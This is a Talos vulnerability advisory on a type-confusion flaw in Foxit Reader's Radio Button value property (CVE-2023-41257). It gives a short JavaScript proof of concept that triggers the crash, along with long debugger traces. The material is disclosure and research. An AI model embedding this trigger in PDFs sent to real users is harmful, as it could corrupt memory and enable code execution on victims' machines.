Talos Vulnerability Report

TALOS-2023-1838

Foxit Reader field value property type confusion vulnerability

November 27, 2023
CVE Number

CVE-2023-41257

SUMMARY

A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a type confusion vulnerability in the way Foxit Reader handles the value property of the Radio Button field. This can be illustrated by the following proof-of-concept code:

function main() {

app.activeDocs[0].getField('Text Field1')['display']

app.activeDocs[0].deletePages(); 

getField('txt5').setAction("Calculate",'delete_pages();'); 

app.activeDocs[0].getField('Radio Button0')['value'] = 'a' ;

}


function delete_pages() {
app.activeDocs[0].deletePages()
}

The above code simply assigns a callback function to the Calculate action for the field txt5, which is promptly triggered when the value property of Radio Button0 is set. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing a large number of objects. It also reset the Radio Button object and assigns it to a different object. The exact cause of this behaviour is unknown. Later on, when the Radio Button object is used without its type validation, a type confusion vulnerability occurs. We can observe the following in the debugger (with PageHeap enabled):

0:002> p
Time Travel Position: D46CA:1D56
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b1 esp=072fee4c ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f051:
0258c7b1 ff37            push    dword ptr [edi]      ds:002b:072fef18=47418ff8
0:002> p
Time Travel Position: D46CA:1D57
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b3 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f053:
0258c7b3 8bce            mov     ecx,esi
0:002> p
Time Travel Position: D46CA:1D58
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b5 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f055:
0258c7b5 c645fc08        mov     byte ptr [ebp-4],8         ss:002b:072feed4=00
0:002> dd esi                                             ; <-------------------------------------- [1]
37193830  00000002 00000000 22af8800 37193710
37193840  00000000 22b04918 00000001 00000001
37193850  00000000 00000004 00000000 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> ba w4 37193830                                      ; <-------------------------------------- [2]
0:002> p
Time Travel Position: D46CA:1D59
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b9 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff      call    FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0) ; <---------------- [3]
0:002> u
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff      call    FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0)
0258c7be 8b5de8          mov     ebx,dword ptr [ebp-18h]
0258c7c1 85db            test    ebx,ebx
0258c7c3 7456            je      FoxitPDFReader!safe_vsnprintf+0xf8f0bb (0258c81b)
0258c7c5 c7458800000000  mov     dword ptr [ebp-78h],0
0258c7cc c7458c00000000  mov     dword ptr [ebp-74h],0
0258c7d3 c7459000000000  mov     dword ptr [ebp-70h],0
0258c7da 8d45e0          lea     eax,[ebp-20h]
0:002> bp 0258c7be                                           
0:002> p
Breakpoint 3 hit
Time Travel Position: D4E44:C2
eax=00003801 ebx=072fe1dc ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe0e8 ebp=072fe0f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06            mov     eax,dword ptr [esi]  ds:002b:37193000=00000053

0:002> dd 37193830
37193830  371936e0 00000000 22af8800 37193710
37193840  00000000 22b04918 00000000 00000001
37193850  00000000 00000004 00000000 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> ba w4 3719383c                                           ; <-------------------------------------- [4]
0:002> g
Breakpoint 3 hit
Time Travel Position: D4E45:C05
eax=37193830 ebx=072fe14c ecx=00000000 edx=00000005 esi=00000010 edi=0000000c
eip=01b27f90 esp=072fe08c ebp=072fe094 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52a830:
01b27f90 66894c780c      mov     word ptr [eax+edi*2+0Ch],cx ds:002b:37193854=0004

[...] 

:002> g
Breakpoint 6 hit
Time Travel Position: D5347:FC7
eax=0000001f ebx=04614a58 ecx=00000007 edx=62626952 esi=04614a58 edi=3719383c
eip=03eef09b esp=072fe39c ebp=072fe3c0 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d76b:
03eef09b 83c704          add     edi,4
0:002> dd 37193830
37193830  00000001 0000001f 0000001f 62626952
37193840  006e0067 00740061 00720075 005f0065
37193850  002e0031 00000000 00000000 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1BB7
eax=37193830 ebx=00000000 ecx=072fe3d0 edx=37193850 esi=00000000 edi=15faafe4
eip=01b29758 esp=072fe39c ebp=072fe3c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52bff8:
01b29758 8b01            mov     eax,dword ptr [ecx]  ds:002b:072fe3d0=37193830
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1C33
eax=00003801 ebx=00000000 ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe328 ebp=072fe330 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06            mov     eax,dword ptr [esi]  ds:002b:37193000=00000053
0:002> g
Breakpoint 4 hit
Time Travel Position: D5354:6E8
eax=ffffffff ebx=00000001 ecx=a8eb98f8 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7be esp=072fee50 ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f05e:
0258c7be 8b5de8          mov     ebx,dword ptr [ebp-18h] ss:002b:072feec0=14e46fa8
0:002> dd 37193830                                                       ; <-------------------------------------- [5]
37193830  371936e0 0000001f 0000001f 62626952
37193840  435f6e6f 67657461 5f79726f 74736f50
37193850  6e616353 6974704f 00736e6f 00000000
37193860  00000106 00000000 0000002a 00000000
37193870  00000000 371956e0 00000010 0000000b
37193880  3719b2d4 3719b2c0 0000000a 00000000
37193890  00010106 37193860 00000000 00000000
371938a0  00000000 37195720 00000010 00000002
0:002> da 37193830+c 
3719383c  "Ribbon_Category_PostScanOptions"

0:002> pc
Time Travel Position: D5354:6F2
eax=072feeb8 ebx=14e46fa8 ecx=072fee60 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7e5 esp=072fee4c ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f085:
0258c7e5 e82678feff      call    FoxitPDFReader!safe_vsnprintf+0xf768b0 (02574010)
0:002> pc
Time Travel Position: D5358:1008
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=0258c7f0 esp=072fee4c ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f090:
0258c7f0 e89bc93bff      call    FoxitPDFReader!safe_vsnprintf+0x34ba30 (01949190)
0:002> t
Time Travel Position: D5358:1009
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949190 esp=072fee48 ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba30:
01949190 55              push    ebp
0:002> p
Time Travel Position: D5358:100A
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949191 esp=072fee44 ebp=072feed8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba31:
01949191 8bec            mov     ebp,esp
0:002> p
Time Travel Position: D5358:100B
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949193 esp=072fee44 ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba33:
01949193 ff710c          push    dword ptr [ecx+0Ch]  ds:002b:3719383c=62626952 <-------------------------[6]
0:002> p
Time Travel Position: D5358:100C
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949196 esp=072fee40 ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba36:
01949196 ff7508          push    dword ptr [ebp+8]    ss:002b:072fee4c=072feea4
0:002> p
Time Travel Position: D5358:100D
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949199 esp=072fee3c ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba39:
01949199 e812bdffff      call    FoxitPDFReader!safe_vsnprintf+0x347750 (01944eb0)

0:002> t
Time Travel Position: D5358:100E
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01944eb0 esp=072fee38 ebp=072fee44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x347750:
01944eb0 55              push    ebp
0:002> pc
Time Travel Position: D5358:1022
eax=62626952 ebx=14e46fa8 ecx=072fedf0 edx=00000000 esi=37193830 edi=072fef18
eip=01944ef1 esp=072fedd8 ebp=072fee34 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
FoxitPDFReader!safe_vsnprintf+0x347791:
01944ef1 e8ca6a1e00      call    FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:1039
eax=072fedf0 ebx=14e46fa8 ecx=072fee0c edx=00000004 esi=37193830 edi=072fef18
eip=01944f0f esp=072fedd8 ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477af:
01944f0f e8ac6a1e00      call    FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:104C
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01944f1b esp=072fede0 ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477bb:
01944f1b e870b7ffff      call    FoxitPDFReader!safe_vsnprintf+0x342f30 (01940690)
0:002> t
Time Travel Position: D5358:104D
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940690 esp=072feddc ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f30:
01940690 55              push    ebp
0:002> t
Time Travel Position: D5358:104E
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940691 esp=072fedd8 ebp=072fee34 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f31:
01940691 8bec            mov     ebp,esp
0:002> p
Time Travel Position: D5358:104F
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940693 esp=072fedd8 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f33:
01940693 6aff            push    0FFFFFFFFh
0:002> p
Time Travel Position: D5358:1050
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940695 esp=072fedd4 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f35:
01940695 6829924104      push    offset FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x9678f9 (04419229)
0:002> p
Time Travel Position: D5358:1051
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=0194069a esp=072fedd0 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f3a:
0194069a 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:1052
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a0 esp=072fedd0 ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f40:
019406a0 50              push    eax
0:002> p
Time Travel Position: D5358:1053
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a1 esp=072fedcc ebp=072fedd8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f41:
019406a1 83ec4c          sub     esp,4Ch
0:002> p
Time Travel Position: D5358:1054
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a4 esp=072fed80 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f44:
019406a4 53              push    ebx
0:002> p
Time Travel Position: D5358:1055
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a5 esp=072fed7c ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f45:
019406a5 56              push    esi
0:002> p
Time Travel Position: D5358:1056
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a6 esp=072fed78 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f46:
019406a6 57              push    edi
0:002> p
Time Travel Position: D5358:1057
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a7 esp=072fed74 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f47:
019406a7 a1e4149405      mov     eax,dword ptr [FoxitPDFReader!fLS::FLAGS_log_backtrace_at+0x110180 (059414e4)] ds:002b:059414e4=afc476d4
0:002> p
Time Travel Position: D5358:1058
eax=afc476d4 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ac esp=072fed74 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f4c:
019406ac 33c5            xor     eax,ebp
0:002> p
Time Travel Position: D5358:1059
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ae esp=072fed74 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4e:
019406ae 50              push    eax
0:002> p
Time Travel Position: D5358:105A
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406af esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4f:
019406af 8d45f4          lea     eax,[ebp-0Ch]
0:002> p
Time Travel Position: D5358:105B
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b2 esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f52:
019406b2 64a300000000    mov     dword ptr fs:[00000000h],eax fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:105C
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b8 esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f58:
019406b8 8bd9            mov     ebx,ecx
0:002> p
Time Travel Position: D5358:105D
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ba esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5a:
019406ba 8b33            mov     esi,dword ptr [ebx]  ds:002b:072fede8=62626952 <---------------- [7]
0:002> p
Time Travel Position: D5358:105E
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406bc esp=072fed70 ebp=072fedd8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5c:
019406bc 85f6            test    esi,esi
0:002> p
Time Travel Position: D5358:105F
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406be esp=072fed70 ebp=072fedd8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f5e:
019406be 0f84d9010000    je      FoxitPDFReader!safe_vsnprintf+0x34313d (0194089d) [br=0]

At [1], we examine the vulnerable field object. The first 4 bytes of the object indicate the type of the field. The Push Button, Radio Button and Check Box fields are indicated by the values 1, 2 and 3 respectively. Here, the vulnerable field object type is the Radio Button. Two breakpoints are set on the write access at different offsets of the vulnerable pointer at [2] and [4]. These breakpoints were hit multiple times when the function at [3] was called. At [5], it can be observed that the vulnerable object type is different. Later on, the value at the offset 0x0c of the vulnerable object is assigned to the esi register at [6] and [7]. The crash occurs later in the code when the memory pointed to by the esi register is dereferenced. This can be observed in a debugger at the time of the crash:

0:002> g
(11a0.c34): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: D5359:0
eax=00000054 ebx=072fede8 ecx=00000054 edx=00000000 esi=62626962 edi=072fed90
eip=01b366d2 esp=072fed14 ebp=072fed1c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608          div     eax,dword ptr [esi+8] ds:002b:6262696a=????????
0:002> u
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608          div     eax,dword ptr [esi+8]
01b366d5 8b450c          mov     eax,dword ptr [ebp+0Ch]
01b366d8 8910            mov     dword ptr [eax],edx
01b366da 8b7604          mov     esi,dword ptr [esi+4]
01b366dd 85f6            test    esi,esi
01b366df 7422            je      FoxitPDFReader!safe_vsnprintf+0x538fa3 (01b36703)
01b366e1 8b3496          mov     esi,dword ptr [esi+edx*4]
01b366e4 85f6            test    esi,esi
0:002> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fed1c 01b36cd0     072fed90 072fed2c 62626962 FoxitPDFReader!safe_vsnprintf+0x538f72
01 072fed30 01801f2a     072fed90 072fed48 a8eb9b8c FoxitPDFReader!safe_vsnprintf+0x539570
02 072fed58 0194073f     072fedc8 072fed90 00000000 FoxitPDFReader!safe_vsnprintf+0x2047ca
03 072fedd8 01944f20     a8eb98e0 37193830 62626952 FoxitPDFReader!safe_vsnprintf+0x342fdf
04 072fee34 0194919e     072feea4 62626952 072feed8 FoxitPDFReader!safe_vsnprintf+0x3477c0
05 072fee44 0258c7f5     072feea4 a8eb980c 13304f40 FoxitPDFReader!safe_vsnprintf+0x34ba3e
06 072feed8 0257767a     2c256ff8 072fef00 ffffffff FoxitPDFReader!safe_vsnprintf+0xf8f095
07 072fef38 02597097     024b2110 072fef7c 072fef64 FoxitPDFReader!safe_vsnprintf+0xf79f1a
08 072fef6c 0256a8b1     48d6cff8 072fef94 0eebf8e0 FoxitPDFReader!safe_vsnprintf+0xf99937
09 072fefc0 02833022     3ddf4ff8 072fefe4 48d6cff8 FoxitPDFReader!safe_vsnprintf+0xf6d151
0a 072feffc 0289d8b0     072ff488 072ff498 4b8aa600 FoxitPDFReader!FXJSE_GetClass+0x552
0b 072ff064 028b30a4     072ff0cc 3dfb3068 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x6a4a0
0c 072ff118 028b2df4     072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7fc94
0d 072ff15c 028b3696     072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f9e4
0e 072ff268 028b2d84     072ff2d8 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x80286
0f 072ff2b0 028b2acc     072ff2d8 072f0001 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f974
10 072ff2dc 02cfcff2     072ff39c 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f6bc
11 072ff3c0 02cf72b0     072ff44c 072ff48c 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c9be2
12 072ff460 02c38c3b     00000005 072ff498 4b8aa600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c3ea0
13 072ff480 02cb0bea     538856a1 52c3172d 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40582b
14 072ff4bc 02bd4d79     5395209d 539520b9 52c31511 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x47d7da
15 072ff4e8 02bd4d79     538feb6d 53951ec1 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
16 072ff510 02bd3400     538feb6d 538821b1 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
17 072ff528 02bd3229     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fff0
18 072ff554 0286f59e     4b8aa600 53882339 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fe19
19 072ff664 0286f0b2     072ff7f8 4b8aa600 072ff6c0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
1a 072ff6ec 02857da4     072ff7f8 4b8aa600 3dfb3024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bca2
1b 072ff89c 028578a0     072ff938 3dfb3040 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
1c 072ff8b0 028312af     072ff938 3dfb3040 a8eb8ffc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
1d 072ff928 02831be6     3dfb3024 181ecff8 3dfb3010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
1e 072ff964 024af2f4     4d2b0fd8 3ff79c8c 181ecff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1f 072ff9c8 024b01e0     00000000 072ffa40 072ffa0c FoxitPDFReader!safe_vsnprintf+0xeb1b94
20 072ff9dc 02600775     072ffa40 072ffa0c a8eb8cd0 FoxitPDFReader!safe_vsnprintf+0xeb2a80
21 072ffa04 02600879     00000000 072ffa40 a8eb8cec FoxitPDFReader!safe_vsnprintf+0x1003015
22 072ffa38 024b2360     371b7020 00000113 072ffa5c FoxitPDFReader!safe_vsnprintf+0x1003119
23 072ffa48 00bf7e97     00000113 00007ee6 16fc9251 FoxitPDFReader!safe_vsnprintf+0xeb4c00
24 072ffa5c 769223b3     00000000 00000113 00007ee6 FoxitPDFReader!CryptUIWizExport+0x28147
25 072ffa88 7690ca55     00bf7e80 00000000 00000113 USER32!_InternalCallWinProc+0x2b
26 072ffb58 769117b4     00bf7e80 00000000 00000113 USER32!UserCallWinProc+0x143
27 072ffbcc 769115c0     00000113 072ffbf4 0055d3c4 USER32!DispatchMessageWorker+0x1e4
28 072ffbd8 0055d3c4     0f042ec8 0f042ec8 05ae3738 USER32!DispatchMessageW+0x10
29 072ffbf4 0055d483     05ae3738 0055d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
2a 072ffc14 040a021e     00000000 05b0fab4 071fb000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
2b 072ffc2c 03e65f48     00140000 00000000 09cac308 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
2c 072ffc78 75de7d59     071fb000 75de7d40 072ffce0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
2d 072ffc88 771ab79b     071fb000 43a1b297 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 072ffce0 771ab71f     ffffffff 771d89db 00000000 ntdll!__RtlUserThreadStart+0x2b
2f 072ffcf0 00000000     03e66017 071fb000 00000000 ntdll!_RtlUserThreadStart+0x1b

